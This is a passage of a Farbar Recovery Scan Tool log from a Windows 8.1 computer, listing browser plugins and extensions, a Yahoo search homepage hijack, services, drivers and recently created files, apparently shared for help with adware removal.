FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-03-12] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-13] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-13] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-02-17] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2016-02-17] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-13] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-01-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-01-23] (NVIDIA Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-21] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-21] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-01-21] (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Eirik\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-01-23] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-01-22]
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-01-22]
 
Chrome: 
=======
CHR HomePage: Default -> hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1
CHR StartupUrls: Default -> "hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1"
CHR Profile: C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-05]
CHR Extension: (Google Drive) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-25]
CHR Extension: (YouTube) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-20]
CHR Extension: (Google Search) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-04]
CHR Extension: (Google Docs Offline) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-23]
CHR Extension: (Chrome Nettmarked-betalinger) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-25]
CHR Extension: (Gmail) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-29]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-01-20]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [227968 2013-02-26] (Qualcomm Atheros Commnucations) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [226440 2016-01-20] (AVAST Software)
S2 BstHdAndroidSvc; c:\Program Files (x86)\BlueStacks\HD-Service.exe [393080 2013-01-07] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; c:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [384888 2013-01-07] (BlueStack Systems, Inc.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15344 2013-03-22] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [326760 2014-09-05] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [731648 2013-02-13] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [820184 2013-02-13] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-03-12] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-03-12] (Intel Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193144 2015-11-20] (Logitech Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 Micro Star SCM; C:\Program Files (x86)\SCM\MSIService.exe [160768 2013-04-18] (Micro-Star International Co., Ltd.) [File not signed]
R2 MSI_SuperCharger; C:\Program Files (x86)\MSI\Super-Charger\ChargeService.exe [154112 2013-02-08] (MSI) [File not signed]
S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [3611808 2015-07-22] (INCA Internet Co., Ltd.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
S3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
S2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R2 OfficeSvc; C:\Program Files\Microsoft Office 15\ClientX64\integratedoffice.exe [1854056 2012-12-07] (Microsoft Corporation)
R2 Qualcomm Atheros Killer Service; C:\Program Files\Qualcomm Atheros\Killer Network Manager\BFNService.exe [495616 2013-03-15] () [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [619904 2012-12-11] (Wacom Technology, Corp.)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-02-25] (Atheros) [File not signed]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 akw8x64; C:\Windows\system32\DRIVERS\akw8x64.sys [3758800 2013-03-15] (Qualcomm Atheros, Inc.)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [28656 2016-01-20] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [97648 2016-01-20] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2016-01-20] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65224 2016-01-20] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1065208 2016-01-20] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [464256 2016-01-20] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [155304 2016-01-20] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [273784 2016-01-20] (AVAST Software)
S1 BfLwf; C:\Windows\system32\DRIVERS\bwcW8x64.sys [74096 2013-03-15] (Qualcomm Atheros, Inc.)
S2 BstHdDrv; c:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [71032 2013-01-07] (BlueStack Systems)
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-26] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
R3 Ke2200; C:\Windows\system32\DRIVERS\e22w8x64.sys [174448 2013-03-15] (Qualcomm Atheros, Inc.)
S3 LADF_BakerCOnly; C:\Windows\system32\DRIVERS\ladfBakerCamd64.sys [363096 2010-07-08] (Logitech)
S3 LADF_BakerROnly; C:\Windows\system32\DRIVERS\ladfBakerRamd64.sys [334552 2010-07-08] (Logitech)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
S3 lgLowAudio; C:\Windows\system32\drivers\lgLowAudio.sys [26264 2015-11-20] (Logitech Inc.)
S3 LGSHidFilt; C:\Windows\system32\DRIVERS\LGSHidFilt.Sys [64280 2013-05-30] (Logitech Inc.)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-02-21] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 NTIOLib_1_0_3; C:\Program Files (x86)\MSI\Super-Charger\NTIOLib_X64.sys [13368 2012-10-26] (MSI)
R1 nvkflt; C:\Windows\system32\DRIVERS\nvkflt.sys [307768 2016-01-23] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [448072 2013-04-24] (RTS Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [34544 2015-10-29] (Synaptics Incorporated)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-10] (Apple, Inc.) [File not signed]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-21 17:14 - 2016-02-21 17:14 - 00031774 _____ C:\Users\Eirik\Desktop\FRST.txt
2016-02-21 16:23 - 2016-02-21 16:23 - 02371072 _____ (Farbar) C:\Users\Eirik\Downloads\FRST64 (1).exe
2016-02-21 16:23 - 2016-02-21 16:23 - 02371072 _____ (Farbar) C:\Users\Eirik\Desktop\FRST64.exe
2016-02-21 16:23 - 2016-02-21 16:23 - 00000000 ____D C:\Users\Eirik\Documents\Egendefinerte Office-maler
2016-02-21 16:22 - 2016-02-21 17:14 - 00000000 ____D C:\FRST
2016-02-21 16:21 - 2016-02-21 16:21 - 02371072 _____ (Farbar) C:\Users\Eirik\Downloads\FRST64.exe
2016-02-21 16:21 - 2016-02-21 16:21 - 01722368 _____ (Farbar) C:\Users\Eirik\Downloads\FRST.exe
2016-02-21 15:20 - 2016-02-21 15:20 - 07194312 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (5).exe
2016-02-21 15:20 - 2016-02-21 15:20 - 06503984 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (5).exe
2016-02-21 15:20 - 2016-02-21 15:20 - 01420840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm (2).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 07186992 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (4).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 06554576 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (4).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 05673816 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (3).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 01453976 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm (1).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04995416 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (3).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04961800 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (2).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04216840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (2).exe
2016-02-21 15:17 - 2016-02-21 15:17 - 03200960 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (1).exe
2016-02-21 15:16 - 2016-02-21 15:16 - 02723264 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (1).exe
2016-02-21 15:15 - 2016-02-21 15:15 - 07194312 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64.exe
2016-02-21 15:15 - 2016-02-21 15:15 - 06503984 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86.exe
2016-02-21 15:15 - 2016-02-21 15:15 - 01420840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm.exe
2016-02-21 15:14 - 2016-02-21 16:19 - 00001002 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-21 15:14 - 2016-02-21 15:19 - 00000998 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-21 15:14 - 2016-02-21 15:14 - 00003974 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-21 15:14 - 2016-02-21 15:14 - 00003738 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-21 15:14 - 2016-02-21 15:14 - 00002308 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-21 15:14 - 2016-02-21 15:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\Deployment
2016-02-21 15:14 - 2016-02-21 15:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\Apps\2.0
2016-02-21 15:10 - 2016-02-21 15:10 - 00001181 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-02-21 15:10 - 2016-02-21 15:10 - 00001169 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-02-21 15:10 - 2016-02-21 15:10 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-21 15:10 - 2016-02-21 15:10 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-21 14:44 - 2016-02-21 15:20 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-21 14:44 - 2016-02-21 14:44 - 13767776 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vc_redist.x86.exe
2016-02-21 14:06 - 2016-02-21 14:06 - 00000000 ____D C:\ProgramData\e8446722-6f23-0
2016-02-21 14:06 - 2016-02-21 14:06 - 00000000 ____D C:\ProgramData\e8446722-2d61-1
2016-02-21 13:44 - 2016-02-21 13:44 - 00242080 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2.exe
2016-02-21 12:57 - 2016-02-21 15:59 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-02-21 12:56 - 2016-02-21 12:56 - 22908888 _____ (Malwarebytes ) C:\Users\Eirik\Downloads\mbam-setup-2.2.0.1024.exe
2016-02-21 12:56 - 2016-02-21 12:56 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-21 12:56 - 2016-02-21 12:56 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-02-21 12:56 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-02-21 12:56 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-02-21 12:56 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-02-21 12:46 - 2016-02-21 12:48 - 00000000 ____D C:\AdwCleaner
2016-02-21 12:46 - 2016-02-21 12:46 - 01511424 _____ C:\Users\Eirik\Downloads\adwcleaner_5.035.exe
2016-02-21 04:20 - 2016-02-21 04:20 - 00000000 ____D C:\Users\Eirik\Desktop\Gamle Firefox-data
2016-02-20 20:06 - 2016-02-21 13:37 - 00000000 ____D C:\ProgramData\e8446722-6925-0
2016-02-20 20:01 - 2016-02-21 13:37 - 00000000 ____D C:\ProgramData\e8446722-69a5-0
2016-02-20 20:01 - 2016-02-20 20:01 - 00003728 _____ C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011}
2016-02-20 20:01 - 2016-02-20 20:01 - 00000000 ____D C:\ProgramData\d2538854
2016-02-19 12:46 - 2016-02-19 12:46 - 00000000 ____D C:\Users\Eirik\AppData\Local\Jagex
2016-02-19 12:46 - 2016-02-19 12:46 - 00000000 ____D C:\ProgramData\Jagex
2016-02-19 12:44 - 2016-02-19 12:44 - 03269920 _____ (Jagex Ltd ) C:\Users\Eirik\Downloads\RuneScape-Setup.exe
2016-02-18 00:04 - 2016-02-18 00:04 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-02-17 13:06 - 2016-02-17 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-02-17 13:05 - 2016-02-17 13:05 - 01113856 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\Setup.X86.nb-no_O365ProPlusRetail_a9a627a4-ddaa-4aab-9b90-4499b4a944e3_TX_PR_.exe
2016-02-17 13:05 - 2016-02-17 13:05 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-02-17 12:17 - 2016-02-17 12:17 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\GeoGebra 5.0
2016-02-15 14:58 - 2016-02-15 14:58 - 00005019 _____ C:\Users\Eirik\Downloads\replay_1346256955.bat
2016-02-13 01:48 - 2016-02-13 01:48 - 00000000 ____D C:\Users\Eirik\AppData\Local\Nico Mak Computing
2016-02-13 01:48 - 2016-02-13 01:48 - 00000000 ____D C:\ProgramData\WinZip
2016-02-13 01:45 - 2016-02-13 01:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-13 01:45 - 2016-02-13 01:49 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-13 01:43 - 2016-02-13 01:43 - 00735328 _____ (Oracle Corporation) C:\Users\Eirik\Downloads\jxpiinstall(5).exe
2016-02-13 01:26 - 2016-02-13 01:26 - 30510920 _____ C:\Users\Eirik\Downloads\vlc-2.2.2-win32.exe
2016-02-12 02:51 - 2016-02-06 11:48 - 25839104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-12 02:51 - 2016-02-06 11:24 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-02-12 02:51 - 2016-02-06 11:01 - 20366848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-12 02:51 - 2016-02-06 10:43 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-02-12 02:51 - 2016-02-06 10:32 - 14458368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-12 02:51 - 2016-02-06 10:16 - 12857856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-12 02:51 - 2016-02-06 10:09 - 01547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-12 02:51 - 2016-02-06 09:54 - 01312256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 10:44 - 2016-01-22 09:01 - 22365992 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-02-10 10:44 - 2016-01-22 08:11 - 19794896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-02-10 10:44 - 2016-01-22 06:25 - 14467072 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 10:44 - 2016-01-22 06:14 - 12879360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 10:44 - 2016-01-15 02:42 - 00033472 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-02-10 10:44 - 2016-01-14 21:44 - 01362944 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 01162240 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00677376 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-02-10 10:44 - 2016-01-10 20:37 - 00442720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-10 10:44 - 2016-01-10 19:39 - 00332640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-10 10:44 - 2016-01-10 19:15 - 00401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-02-10 10:44 - 2016-01-10 19:15 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-02-10 10:44 - 2016-01-10 18:50 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll
2016-02-10 10:44 - 2016-01-10 18:43 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2016-02-10 10:44 - 2016-01-10 18:31 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 10:44 - 2016-01-10 18:16 - 00898048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-02-10 10:44 - 2016-01-10 18:14 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-10 10:44 - 2016-01-10 18:12 - 00532480 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-02-10 10:44 - 2016-01-10 18:09 - 01442304 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-10 10:44 - 2016-01-10 18:09 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2016-02-10 10:44 - 2016-01-10 18:02 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 10:44 - 2016-01-10 17:58 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 10:44 - 2016-01-10 17:56 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2016-02-10 10:44 - 2016-01-10 17:51 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-02-10 10:44 - 2016-01-10 17:49 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EncDec.dll
2016-02-10 10:44 - 2016-01-10 17:43 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 10:44 - 2016-01-10 17:40 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 10:44 - 2016-01-07 19:34 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-02-10 10:44 - 2015-12-29 16:45 - 07783936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 10:44 - 2015-12-29 16:45 - 07075328 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll
